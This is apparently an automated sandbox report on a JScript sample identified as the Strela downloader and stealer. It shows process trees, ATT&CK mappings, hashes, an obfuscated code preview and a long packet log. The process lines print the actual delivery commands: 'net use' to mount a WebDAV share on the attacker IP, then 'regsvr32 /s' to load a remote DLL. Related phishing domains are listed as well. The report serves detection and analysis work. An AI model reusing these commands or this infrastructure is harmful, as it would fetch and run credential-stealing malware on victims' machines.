              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: CreateThread,GetLocaleInfoA,11_2_024B9A30
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              Source: Yara match | File source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3144, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\regsvr32.exe | File opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dll

              Remote Access Functionality

              Source: Yara match | File source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3144, type: MEMORYSTR
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
              Resource Development: 12 Scripting; Domains; DNS Server; Virtual Private Server; Server
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
              Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd
              Persistence: 12 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
              Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
              Defense Evasion: 1 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 Regsvr32; 1 DLL Side-Loading
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
              Discovery: 2 Network Share Discovery; 1 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 File and Directory Discovery; 12 System Information Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
              Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
              Command and Control: 1 Encrypted Channel; 11 Non-Standard Port; 11 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
              Behavior Graph ID: 1576785 | Sample: 126484723232027823.js | Start date: 17/12/2024 | Architecture: WINDOWS | Score: 88
              Sample-level signatures: Yara detected Strela Downloader; Yara detected Strela Stealer; Uses known network protocols on non-standard ports; 2 other signatures
              Process tree from the behavior graph:
              • wscript.exe (signatures: JScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Gathers information about network shares)
                • cmd.exe (signature: Gathers information about network shares)
                  • cmd.exe (signature: Gathers information about network shares)
                    • net.exe -> 193.143.1.231, ports 49704, 49705, 49706 (BITWEB-ASRU, country unknown)
                  • cmd.exe
                    • regsvr32.exe (signature: Opens network shares)
                  • conhost.exe

              Source | Detection | Scanner | Label
              126484723232027823.js | 0% | ReversingLabs
              No Antivirus matches
              Source | Detection | Scanner | Label
              http://193.143.1.231/bcf3ed6d7050e4 | 0% | Avira URL Cloud | safe
              http://193.143.1.231/dI | 0% | Avira URL Cloud | safe
              http://193.143.1.231/ | 0% | Avira URL Cloud | safe
              http://193.143.1.231/0I | 0% | Avira URL Cloud | safe
              http://193.143.1.231:8888/ | 0% | Avira URL Cloud | safe
              No contacted domains info
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://193.143.1.231/dI | net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://193.143.1.231/bcf3ed6d7050e4 | net.exe, 00000005.00000002.2185942636.00000130183A7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://193.143.1.231/0I | net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://193.143.1.231/ | net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              http://193.143.1.231:8888/ | net.exe, 00000005.00000002.2185942636.0000013018368000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2185942636.0000013018382000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              193.143.1.231 | unknown | unknown | 57271 | BITWEB-ASRU | true
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1576785
              Start date and time: 2024-12-17 15:10:06 +01:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 4m 31s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of new started processes analysed: 13
              Number of new started drivers analysed: 1
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: 126484723232027823.js
              Detection: MAL
              Classification: mal88.rans.troj.spyw.evad.winJS@12/0@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 3
              • Number of non-executed functions: 11
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Excluded processes from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53, 172.202.163.200
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes were analyzed; the report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 126484723232027823.js
              Time | Type | Description
              09:11:02 | API Interceptor | 1x Sleep call for process: net.exe modified
              No context
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              Match: BITWEB-ASRU
              • new.bat | malicious | Unknown | 193.143.1.46
              • qL619hzCfc.bat | malicious | Unknown | 193.143.1.46
              • new.bat | malicious | Unknown | 193.143.1.46
              • https://cgd-assinar.com | malicious | Unknown | 193.143.1.14
              • 11iEly4m6C.bat | malicious | Unknown | 193.143.1.46
              • YnViC5yHLu.bat | malicious | Unknown | 193.143.1.46
              • new.bat | malicious | Unknown | 193.143.1.46
              • https://cmd-autenticacaogov.com/ | malicious | Unknown | 193.143.1.14
              • mipsel.nn.elf | malicious | Mirai, Okiru | 193.143.1.70
              • sparc.nn.elf | malicious | Mirai, Okiru | 193.143.1.70
              No context
              No created / dropped files found
              File type: ASCII text, with very long lines (11695), with no line terminators
              Entropy (8bit): 4.75000181394305
              TrID:
              File name: 126484723232027823.js
              File size: 11'695 bytes
              MD5: 09024cb4c452f96fe5b6045e198092ba
              SHA1: 53f924039e79576a5b2e9b90e3c11c1116e933eb
              SHA256: 0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
              SHA512: 5e0146dc0e358a0a78964abceb2cf735fd1c7d9e0efaae05a0ad39d441c5329a88f0ff28ce5a6171690963398eb4884219db77e66316348b38f2a979dcb4b494
              SSDEEP: 192:JxTxIOSN8HHdiTp9JRSSZxSSGSSZxSSf1OSSB5SS3uVX+++QZPP/RvOSSZxSS5nK:P1y1uVIuuVOhpD
              TLSH: 6832BF9DB6E4F44818FE9100336291106DA6747E7F32CB2DB3EE998866443F59ED703A
              File Content Preview: function ftewq(){this[hfgkhke+iqkshjqkp+conprmvk+mwncmi](gebyyu+eoztg+jqskgadc+jvaxx+xqqrniwzz+zxqbq+qtwic+cblmmvh+cblmmvh+iqkshjqkp+acrinokm+qtwic+gebyyu+conprmvk+djwmv+ktqhqp+djwmv+woscoo+acrinokm+gbeabu+cblmmvh+oindqeulx+zxqbq+jvaxx+ktqhqp+qxdyfx+jqskg
              Icon Hash: 68d69b8bb6aa9a86
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 17, 2024 15:11:15.965090036 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.976685047 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.976757050 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:15.997355938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.997401953 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:15.997456074 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.006537914 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.006580114 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.006635904 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.015825987 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.015870094 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.015904903 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.015922070 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.024991035 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.025031090 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.025068045 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.034208059 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.034245968 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.034285069 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.043450117 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.043486118 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.043531895 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.052705050 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.052746058 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.052767992 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.052781105 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.052855968 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.061867952 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.061903954 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.062057018 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.071178913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.071214914 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.071278095 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.080473900 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.080540895 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.080594063 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.089566946 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.089603901 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.089654922 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.098793983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.098830938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.098864079 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.098994017 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.108256102 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.108313084 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.108330965 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.117221117 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.117258072 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.117279053 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.126427889 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.126465082 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.126487017 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.135670900 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.135705948 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.135730028 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.135740042 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.135787964 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.144893885 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.144928932 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.144985914 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.153956890 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.153995037 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.154048920 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.163156033 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.163176060 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.163224936 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.171945095 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.171966076 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.172043085 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.180583954 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.180597067 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.180608034 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.180649042 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.189153910 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.189189911 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.189218998 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.197607040 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.197628021 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.197679043 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.206075907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.206091881 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.206156969 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.214289904 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.214306116 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.214317083 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.214361906 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.214380980 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.222486973 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.222500086 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.222568035 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.230417013 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.230428934 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.230485916 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.238420010 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.246248960 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.246265888 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.246275902 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.246339083 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.246376991 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.253885031 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.253900051 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.253962994 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.261464119 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.261477947 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.261557102 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.268953085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.268966913 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.269026041 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.276349068 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.276361942 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.276408911 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.283806086 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.283840895 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.283853054 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.283910036 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.291260958 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.291274071 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.291337013 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.298729897 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.298743010 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.298798084 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.306158066 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.306169987 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.306230068 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.313613892 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.313627005 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.313636065 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.313682079 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.313728094 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.321074009 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.321085930 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.321140051 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.328423023 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.328434944 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.328502893 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.335849047 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.335866928 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.335931063 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.343128920 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.343146086 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.343245029 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.350394011 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.350408077 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.350419044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.350501060 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.357681036 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.357702017 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.357875109 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.364830971 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.364845037 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.364897966 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.371927977 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.371942043 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.371984959 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.379044056 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.379059076 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.379070044 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.379105091 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.379142046 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.386199951 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.386219978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.386274099 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.393088102 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.393112898 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.393152952 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.400001049 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.400013924 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.400067091 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.406780958 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.406821012 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.406877995 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.413631916 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.413650990 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.413662910 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.413707972 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.420296907 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.420363903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.420368910 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.426898003 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.426912069 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.426973104 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.433480978 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.433492899 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.433538914 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.439877987 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.439889908 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.439899921 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.439934969 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.439965963 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.446333885 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.446355104 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.446439028 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.452649117 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.452802896 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.452851057 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.459038973 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.459059000 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.459127903 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.465341091 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.465368986 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.465426922 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.471594095 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.471616983 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.471627951 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.471672058 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.477883101 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.477895975 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.477951050 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.483958006 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.483969927 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.484030008 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.490184069 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.490196943 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.490257025 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.496161938 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.496195078 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.496205091 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.496221066 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.496242046 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.502217054 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.502254963 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.502320051 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.508296967 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.508321047 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.508394957 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.514328957 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.514343023 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.514400959 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.520534039 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.520589113 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.520657063 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.526334047 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.526387930 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.526426077 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.526446104 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:11:16.532290936 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:11:16.532345057 CET888849709193.143.1.231192.168.2.5
